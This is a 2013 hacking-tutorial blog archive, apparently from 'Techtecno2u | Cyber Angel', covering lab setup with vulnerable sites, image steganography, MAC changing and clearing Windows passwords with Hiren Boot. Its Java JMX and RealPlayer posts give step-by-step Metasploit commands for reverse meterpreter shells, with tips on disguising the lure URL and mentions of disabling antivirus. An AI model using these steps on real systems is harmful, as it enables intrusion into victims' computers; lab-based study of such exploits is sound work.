Friday, January 25, 2013

Coding For Pentester

Coding for Pentester Totally Advance Pentesting Learn With Techtecno2u | Cyber Angel 


Please use your knowledge only for Education Purpose Only not to harm anyone grow your knowledge with  Techtecno2u | Cyber Angel 

Advance wireless Hacking

Learn Totally Advance Wireless Hacking How a wireless works & how you can break wireless Password

WPA , WPA-PSK, WPA-2  Password Breaking  Totally Advance Wireless Hacking


Totally Advance Pentesting with Techtecno2u | Cyber Angel 

Advance Malware Analysis

Total Advance Malware Analysis How a Malware working & How Malware works & how to generate Virus , worm , Backdoor's .....  


Malware Analysis Advance Methods Creating Malicious Viruses


Note : Once Again I will tech you totally offensive Hacking But Only for Education Purpose Not to Spread & I am not Responsible for any Criminal Activities perform by you or any Harm to you & your System Because These Experiments performed in very secure Environment

This is totally Advance Hacking with me Techtecno2u | Cyber Angel  very deep study of the Hacking More Than a CEH Certification Totally Offensive ....  

Pentesting : Advance Pentesting in Secure Environment

Learn Advance Pentesting with me Techtecno2u | Cyber Angel  in very secure Environment

Study Books for advance Pentesting


learn with best hackers of the world Pentesting Guide 

for Advance Pentester ..... 

Metasploit : Learn Metasploit art of Remote system Exploitation

Remote System Exploitation The art of exploitation . How Metasploit framework : A very wide Remote system exploit framework .....

Learn Pentesting  from world International Hackers 




Contents :

Chapter 1: The Absolute Basics of Penetration Testing ..................................................
Chapter 2: Metasploit Basics ........................................................................................
Chapter 3: Intelligence Gathering ...................................................................................
Chapter 4: Vulnerability Scanning...................................................................................
Chapter 5: The Joy of Exploitation.................................................................................
Chapter 6: Meterpreter .................................................................................................
Chapter 7: Avoiding Detection ......................................................................................
Chapter 8: Exploitation Using Client-Side Attacks..........................................................
Chapter 9: Metasploit Auxiliary Modules .......................................................................
Chapter 10: The Social-Engineer Toolkit........................................................................
Chapter 11: Fast-Track.................................................................................................
Chapter 12: Karmetasploit ...........................................................................................
Chapter 13: Building Your Own Module........................................................................
Chapter 14: Creating Your Own Exploits ......................................................................
Chapter 15: Porting Exploits to the Metasploit Framework.............................................
Chapter 16: Meterpreter Scripting.................................................................................
Chapter 17: Simulated Penetration Test..........................................................................

learn with Techtecno2u | Cyber Angel  online free hacking but only of education purpose

Sunday, January 20, 2013

How to Run website in local network using xampp server

How to Run website in local network using xampp server : Dava & Mutillidae websites

Today  we will discus that how a website is running on server in the home network this post gives you idea that how a website is running on the web-server, Here I am using xampp server to run a php website in my home network in my previous post i told you that   How to setup wordpress Blog In Lan Network & in this post we will setup vulnerable websites in the network so that we can complete our Lab for web Pentesting   

Here I have a two website Dava & mutillidea & we will setup these websites in our Lan network 

Requirement : 


  •  Xampp server ( running Apache and MySQL) you can download it from here 

  • also how to install & unable Apache and MySQL is given on this Page .

  • Window xp or Window 7 
  • Dava  or download from here 
  • Mutillidea websites download from here
follow the steps as 

Step 1: As i give you the Requirements download and install the xampp server in your window 



Step 2 : Now extract dava or mutillidea websites in the Directory C:\xampp\htdocs
and unclick on Show extracted files . and finish it 




Step 3 : Go to the directory and see the folder name DAVA and mutillidea

Step 4 : Now start the Apache and MySQL server from xampp as we start these server we are enable to run the websites in the home network



Step 5 : To access these websites start just open the Browser and type http://localhost/DAVA (http://ip-address of host/DAVA) for DAVA website and for mutillidea website  http://localhost/mutillidea (http://ip-address of host/mutillidea)


Now we have vulnerable websites in our home network & now we need to run vulnerability scanner & perform the attacks to hack these websites these all we learn in our next posts we also study that necessary tools & much more to hack a web application .


Friends enjoy Hacking with Techtecno2u | Cyber Angel   



Saturday, January 19, 2013

Stegnography : Hiding Image File Behind Image File

Stegnography : is a art of hiding messages,Images,Data etc. in such a way that no one can see your secret message  without your permission. By using such techniques there is no change in the file & it's quality . There are various tools in the market to hide the data behind other data such as text behind text file , MP3 , Video, exe files etc.
So Today we will discuss that how to Hide  Image file behind Image file without any tool 

So follows the steps as :

Step 1 : Create a folder in the C Drive named  "Secret" 
Step 2 : Copy Images you want to hind in this folder


Step 3 : Now select the Image you want to hide and add them to the winrar file.



Step 4 : Now open command prompt and change your current directory as shown and type the command dir to see the file directory it will shows us the directory now type the following command
copy /b VISHNU.jpeg+Secret.rar output.jpeg 



Step 5 : Now check in folder there is a Image file named output.jpeg Now delete all the other images



Step 6 : To open the hidden files right click on output Image and open with WinRAR Here is our hidden files


                            

Step 7 : Now we can send this output Image to the person you want to send as a secret files. It will shows us the list of all the Images you can extrect them in outher place. 


By this method you can hide files of different format also like mp3,wmv or txt etc 
Njoy Hacking With me ........





Sunday, January 13, 2013

Remote System Hacking using java Applet JMX


Java Applet JMX Remote Code Execution

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.

Exploit Targets

  • Generic (Java Payload) (default)
  • Windows x86 (Native Payload)
  • Mac OS X x86 (Native Payload)
  • Linux x86 (Native Payload)

Requirements :

Attacker : Backtrack
Victim : Window 7

Step 1 : open terminal and type msfconsole metasploit framework.



Step 2 : use exploit/multi/browser/java_jre17_jmxbean
show payloads (It will shows us the list of all the payloads for that particular exploit )


Step 3 : Set payload java/meterpreter/reverse_tcp
show options (It will shows us the all the required options which we need to set )


Step 4 : set SRVHOST 192.168.56.101
set URIPATH / (set the root address for reverse connection)
set LHOST 192.168.56.101 (Local IP Address of our machine)
exploit


as we exploit the target the handler will starts on the IP Address as in my case it will be http://192.168.56.101:8080
we need to send this url to the victim system to makes it more offensive we can use shorturl online service so that you can hide the IP link .
as the exploitation completed the meterpreter session is opened here you can see in the image now we have to check the list of the sessions opened to do so type sessions -l  


Now connect the sessions by command sessions -i 1 (here 1 is my session Id from which we need to connect)


As the meterpreter session is opened we check our system information by sysinfo  here you can see in the image that it is on window 7 machine . as you type shell  in the meterpreter sessions we get the remote shell .  check IP Address by ipconfig command



Thursday, January 10, 2013

How to Change MAC Address of Backtrack Machine

Various Time we Need to Change the MAC Address of our Backtrack Machine to change we use the MAC Changer 
first of all  open Terminal and type ifconfig  friends you known well that This is command we used to see the  IP address in the Linux machine  (Backtrack )


Now as we know as the Interface is in working we can't change the MAC Address of the Machine. So to Stop the Interface we type ifconfig eth0 down  now check ifconfig you will find that our interface eth0 is disable in our machine .

Now our main work is start we have to change the MAC Address to change the MAC Address Type in your Terminal macchanger -r eth0 this command will change your MAC Address Now again we have to run our Interface . To run our interface type ifconfig eth0 up

Now check your IP Address again with ifconfig command & you will find that your MAC address will be changed.



Enjoy friends .....

Monday, January 7, 2013

How to setup wordpress Blog In Lan Network

Wordpress Provides us free facility to setup or run the Blog online . wordpress Blog is a website like application Basically it is developed in php . It's totally open source we can also install it on any hosting . It's easy to work no need to know programming we can developed it basely by just like work on ms work or any text editor . I am also using my own Blog "Techtecno2u.blogspot.com" So let's understand how to setup & run the Blog in a local network , It's necessary to us Because now we have to learn how web applications work & how to hack them what are the vulnerabilities in the web applications & how we setup our own Lab to learn about web vulnerabilities


Requirements: 


  •  Xampp server ( running Apache and MySQL) you can download it from here 

also how to install & unable Apache and MySQL is given on this Page .

  • window xp or window 7 
  • wordpress Application you can download it from here
Follows the steps 

Step 1: As i give you the Requirements download and install the xampp server in your window 



Step 2 : Now extract wordpress in the Directory C:\xampp\htdocs
and unclick on Show extracted files . and finish it 




Step 3 : Go to the directory and see the folder name wordpress .                 

Here is a file name wp-config-sample.php . I want to explain that this is a file contains Mysql setting , Table prefix , secret keys,wordpress Language, ABSPATH .


 First change the name of this file wp-config.php Give name we have to change something in this file .



Step 4 :  we need to create new Database in our localhost to do that open the link in your Browser "localhost/phpmyadmin"  



here create new Database give name as wordpress and press create Button now it show you  confermation message that "Database wordpress has been created

Step 5 : now open the file wp-config.php with notepad and edit DB_NAME as wordpress ( we can change the Database name at both places here and when we create a new database but we need that the name should be same or if you want any other database give the name and give the user name as root and leave the password Blank 



Step 6 : At the end of  file we need to change Authentication unique keys and salts.  



Step 7 : To change these keys go to the address https://api.wordpress.org/secret-key/1.1/salt and 



Step 8 : copy the keys and replace them with wp-config.php file key and save the file 



Step 9 : Now open your Browser and open the link as "localhost/wordpress/wp-admin/install.php"


fill all the necessary information as in the Image 

Now press Install wordpress Button  as you press this button it will show you conformation Success ! 
now you can login to your Blog in the localhost and as you login to your blog it will show you your Dashboard. 

Now your Blog in the local host is ready if you want to access this blog in the local network then you need to just give the IP address of the machine where you install your blog running with xampp server and wp-login.php (http://192.168.56.102/wordpress/wp-login.php) (http://localhost/database/wp-login.php)

Enjoy Hacking & Secure Life Friends...... 

Friday, January 4, 2013

Hiren Boot : Administrator Password Removed --win XP , Win 7 etc

Today we will discuss How to remove Administrator Password by Physically accessing the system. Some Time we forget our system password & and we have some Important Data on desktop & we can't Recover our window so to save this Important Data, we need to Reset the password . Here I want to explain some thing advancely That where the administrator password is stored actually in the windows system Password stores . The windows password is stored in the SAM (Security Account Manager) file and  This file is stored in the windows directory C:\WINDOWS\system32\config



This file is in the Decrypted & Running state we can't access this file easily & neither we can open this file by using notepad or any text editor in the running state . we can only access this file by using the offline mode  or we can say if we boot any live operating system on it then we can easily open this file .

Requirement :

  • Hiren Boot Disk
  • Window whose administrator password need to remove  


Here I am using Hiren Boot live CD  you can download this Live ISO from Hiren Live Here  it is an zip format extract it and make Disk . 

Now to erase the Administrator Password follows the steps :

Step 1 : Insert the Disk and Restart your System it will show you 



Step 2 : select offline NT/2000/xp/vista/7 Password Changer and press enter now it shows you Boot  option then again press ENTER as you press enter it will load Linux kernels 


  
Step 3 : Now select disk where the window installation files here i select 1 where my window is installed and enter 

Step 4 : Now we need to select the path and registry files By default the path is given so we press enter so that the default  path is selected . 



Step 5 : Now select option 1 to password reset  [SAM system security] 
Now the SAM file is loader and here we can edit the SAM file .
Step 6 : Now select 1 for Edit user data and password .



Step 7 : Here we can see the list of the users & also it shows us the writes of the users here we can see three users having admin write and these all are password protected . Here we can't see the password we can perform the following options here 

  • clear user password
  • set new password (change password)
  • make a simple user admin user 
  • unlock and enable user account


Step 8 : from all the above options we select 1 to clear password and as we press enter the password is cleaned .



thanks & keep learning .....

Thursday, January 3, 2013

Remote System Hacking using Real Player



RealPlayer RealMedia File Handling Buffer Overflow

This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109.

Exploit Targets :

  • Windows XP SP3 / Real Player 15.0.5.109 (default)

Requirements :

Attacker : Backtrack
Victim : windows xp 

Step 1 : open terminal and type msfconsole metasploit framework.


Step 2 : use exploit/Techtecno2u_custom_exploits/RealMedia_File_Handling_bof (in previous post we download this exploit from the exploit database and update it into our custom folder ) 


Step 3 : set payload windows/meterpreter/reverse_tcp

show options 
set FILENAME clip.rm  
set LHOST 192.168.56.101
exploit


as we exploit the malicious file clip.rm was generated in the root directory shown in fig. 
Now we need to send this file to the remote system if in the remote system the old version or unpatched software running then the system can be easily compromised 

Step 4 : use exploit/multi/handler to get reverse connection we are using the multi  handler 
Step 5 : set payload windows/meterpreter/reverse_tcp
Step 6 : exploit
as the victim click on the file the handler get the connection and we get the meterpreter session 


Step 7 : type shell to get remote shell  
let's check the IP address of the Remote system


Now we can perform what ever we want to the remote system like uploading any file ,downloading any file antivirus killing ,firewall  killing etc. operations these all are the post exploitation we will discus these soon ... So Its very fun part of the Hacking so to learn how to kill or how to download or upload file keep watching ..... 






Wednesday, January 2, 2013

How to use Custom Exploits in The Metasploit

Before that we are using the exploits by using updating Metasploit by command msfupdate but today we will discus how to use the costume Exploits the exploits which are Newly written, exploits which are easily available on the exploits Databases. we know there are various exploit database example . www.exploit-db.com  this is well known exploit database so let's understand how to download these exploits from data base and how to copy them in the Metasploit framework .


To perform such an action Let's first of all we download the exploit file which have (example.rb) file extension . Here i want to explane that Backtrack 5r3 haveing metasploit in the rubby language and the directory of exploits is in the pentest/exploits/framework/modules/exploits here the exploits are divided into different-different categories depending upon OS linux,windows,apple, etc 

Here i placing my custom exploits in the folder Techtecno2u_custom_exploits  

So follows the steps as :




Step 1 : first of all we go to the website of exploit database i.e www.exploit-db.com   and we need to download the rubby file i.e example.rb . open this file with the gedit editer .



Step 2 : Now go to the directory where we upload our exploit and type nano file_name.rb (RealMedia_File_Handling_bof.rb paste the code here and and save with Ctrl+O and exit editer  by  Ctrl+X .



 Step 3 : Let's check by ls command in the directory 



Step 4 : After installing the costume exploit